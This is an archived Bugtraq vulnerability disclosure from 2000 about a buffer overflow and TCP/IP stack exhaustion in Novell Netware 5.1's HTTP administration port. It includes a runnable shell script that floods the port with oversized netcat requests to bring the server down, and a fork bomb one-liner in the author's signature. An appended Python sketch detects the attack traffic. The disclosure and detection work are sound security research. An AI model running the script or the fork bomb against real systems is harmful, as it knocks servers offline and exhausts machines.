The OpenNET Project / Index page

Novell Netware 5.1 (server 5.00h, Dec 11, 1999)...


Date: Tue, 18 Apr 2000 14:29:27 +0200
From: Michal Zalewski <lcamtuf@TPI.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Novell Netware 5.1 (server 5.00h, Dec 11, 1999)...

Hi again. Another overflow and TCP/IP stack flaw.

Affected: virtually any system running on top of a Netware system with
          http remote administration (including web caching solutions,
          BorderManager firewall and so on)...

There's a buffer overflow in the remote (http, usually on port 8008 or so)
administration protocol for tcp-enabled Netware servers - it might be
exploited by sending a request like this:

GET /
AAAAAAAAAAAAAAAAAAAAAAAAAAA.......(something between 4 and 8kb)

The connection won't be dropped (that's a Netware TCP/IP stack problem or
_feature_), but you'll get an error message on the console, sometimes with
a stack dump (yes, lovely: 41 41 41 41... ;) There are two problems with it:

1. Of course, the overflow, allowing an attacker to execute arbitrary code
   on the server,

2. A problem with the TCP/IP stack; there's no automatic clean-up in case
   of an application crash. By connecting, sending an evil request,
   disconnecting and connecting again for some time (usually a few thousand
   times is enough), the whole TCP/IP stack will be fscked up, causing the
   death of TCP networking (first, the server starts to refuse or
   immediately drops any connection, then stops responding to network
   requests), and, eventually, the whole server dies.

There's a simple script which, left for some time, should kill Netware
TCP/IP. Please change $SERVER and $PORT for testing purposes.

-- kill_nwtcp.c --
#!/bin/sh

SERVER=127.0.0.1
PORT=8008
WAIT=3

DUZOA=`perl -e '{print "A"x4093}'`
MAX=30

while :; do
  ILE=0
  while [ $ILE -lt $MAX ]; do
    (
      (
        echo "GET /"
        echo $DUZOA
        echo
      ) | nc $SERVER $PORT &
      sleep $WAIT
      kill -9 $!
    ) &>/dev/null &
    ILE=$[ILE+1]
  done
  sleep $WAIT
done

-- EOF --

For me, Novell sells pretty good IPX solutions for local networks, but it
isn't the best idea to use it as a firewall, as a system architecture based
on DOS isn't good for Real Networking :(

_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
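
Added example, not part of the original post: a detection sketch for the traffic pattern described above (an oversized line after "GET /", repeated from the same source), meant to run over the first bytes of each connection as recorded by a proxy or capture in front of the administration port. The limits, function names and sample events are assumptions constructed for illustration.

```python
from collections import Counter

MAX_LINE = 2048   # assumed per-line limit, below the 4-8 KB the post reports
THRESHOLD = 20    # assumed count of oversized requests per source before alerting


def longest_line(payload: bytes) -> bytes:
    """Longest LF-delimited line (trailing CR stripped) in the captured bytes."""
    return max((line.rstrip(b"\r") for line in payload.split(b"\n")), key=len)


def classify(payload: bytes, limit: int = MAX_LINE) -> str:
    """Return 'ok', 'oversized', or 'oversized-filler'.

    'oversized-filler' means one byte value makes up at least 90% of the
    long line, which matches the 41 41 41 41 pattern seen in the stack dump.
    """
    line = longest_line(payload)
    if len(line) <= limit:
        return "ok"
    most_common_count = Counter(line).most_common(1)[0][1]
    return "oversized-filler" if most_common_count / len(line) >= 0.9 else "oversized"


def repeat_offenders(events, limit=MAX_LINE, threshold=THRESHOLD):
    """events: iterable of (source_ip, payload) pairs.

    Returns {source_ip: count} for sources that sent at least `threshold`
    oversized requests, i.e. the connect/send/reconnect loop from the post.
    """
    hits = Counter(src for src, payload in events if classify(payload, limit) != "ok")
    return {src: n for src, n in hits.items() if n >= threshold}


# Constructed sample input (documentation address ranges, not real hosts).
SAMPLE = (
    [("192.0.2.10", b"GET /\n" + b"A" * 4093 + b"\n\n")] * 30
    + [("198.51.100.7", b"GET /index.html HTTP/1.0\r\nHost: admin\r\n\r\n")] * 5
    + [("203.0.113.5", b"GET /\n" + b"B" * 5000 + b"\n\n")] * 3
)

if __name__ == "__main__":
    for src, count in repeat_offenders(SAMPLE).items():
        print(f"ALERT {src}: {count} oversized requests to admin port")
```

The same length check, applied as a hard limit in a proxy placed in front of the administration port, rejects the request before it reaches the vulnerable parser.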

Created 1996-2003 by Maxim Chirkov  